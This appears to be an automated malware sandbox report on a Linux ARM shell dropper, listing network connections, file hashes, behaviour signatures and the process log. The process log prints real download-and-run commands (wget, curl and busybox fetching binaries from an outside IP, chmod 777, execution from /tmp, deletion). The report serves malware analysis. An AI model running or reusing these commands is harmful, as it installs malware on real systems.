[wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/chmod

[chmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx

[./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/rm

[rm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
N/A 224.0.0.251:5353 udp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 151.101.1.91:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
GB 89.187.167.5:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-14 02:42

Reported

2024-11-14 02:45

Platform

debian9-armhf-20240611-en

Max time kernel

69s

Max time network

74s

Command Line

[/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m N/A
N/A /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J N/A
N/A /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O N/A
N/A /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB N/A
N/A /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O N/A
N/A /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz N/A
N/A /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE N/A
N/A /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx N/A
N/A /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 N/A
N/A /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC N/A
N/A /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ N/A
N/A /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q N/A
N/A /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 N/A
N/A /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 N/A
N/A /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC N/A
N/A /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ N/A
N/A /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q N/A
N/A /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 N/A
N/A /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 N/A
N/A /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m N/A
N/A /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J N/A
N/A /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O N/A
N/A /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB N/A
N/A /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 N/A
N/A /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O N/A
N/A /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz N/A
N/A /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE N/A
N/A /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx /usr/bin/curl N/A
File opened for modification /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /usr/bin/curl N/A
File opened for modification /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /usr/bin/curl N/A
File opened for modification /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /usr/bin/curl N/A
File opened for modification /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /usr/bin/curl N/A
File opened for modification /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /usr/bin/curl N/A
File opened for modification /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /usr/bin/curl N/A
File opened for modification /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /usr/bin/curl N/A
File opened for modification /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /usr/bin/curl N/A
File opened for modification /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /usr/bin/curl N/A
File opened for modification /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /usr/bin/curl N/A
File opened for modification /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /usr/bin/curl N/A
File opened for modification /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /usr/bin/curl N/A
File opened for modification /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /usr/bin/curl N/A
File opened for modification /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /usr/bin/curl N/A
File opened for modification /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /usr/bin/curl N/A
File opened for modification /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /usr/bin/curl N/A
File opened for modification /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /usr/bin/curl N/A
File opened for modification /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /usr/bin/curl N/A
File opened for modification /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /usr/bin/curl N/A
File opened for modification /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx /usr/bin/curl N/A
File opened for modification /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /usr/bin/curl N/A
File opened for modification /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /usr/bin/curl N/A
File opened for modification /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /usr/bin/curl N/A
File opened for modification /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /usr/bin/curl N/A
File opened for modification /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /usr/bin/curl N/A
File opened for modification /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /usr/bin/curl N/A
File opened for modification /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /usr/bin/curl N/A

Processes

/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh

[/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/chmod

[chmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m

[./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/rm

[rm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/usr/bin/wget

[wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/chmod

[chmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J

[./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/rm

[rm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/usr/bin/wget

[wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/chmod

[chmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O

[./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/rm

[rm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/usr/bin/wget

[wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/chmod

[chmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB

[./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/rm

[rm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/usr/bin/wget

[wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/chmod

[chmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O

[./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/rm

[rm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/usr/bin/wget

[wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/chmod

[chmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz

[./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/rm

[rm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/usr/bin/wget

[wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/chmod

[chmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE

[./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/rm

[rm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/usr/bin/wget

[wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/chmod

[chmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx

[./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/rm

[rm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/usr/bin/wget

[wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/chmod

[chmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4

[./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/rm

[rm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/usr/bin/wget

[wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/chmod

[chmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC

[./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/rm

[rm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/usr/bin/wget

[wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/chmod

[chmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ

[./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/rm

[rm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/chmod

[chmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q

[./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/rm

[rm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/usr/bin/wget

[wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/chmod

[chmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0

[./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/rm

[rm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/usr/bin/wget

[wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/chmod

[chmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0

[./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/rm

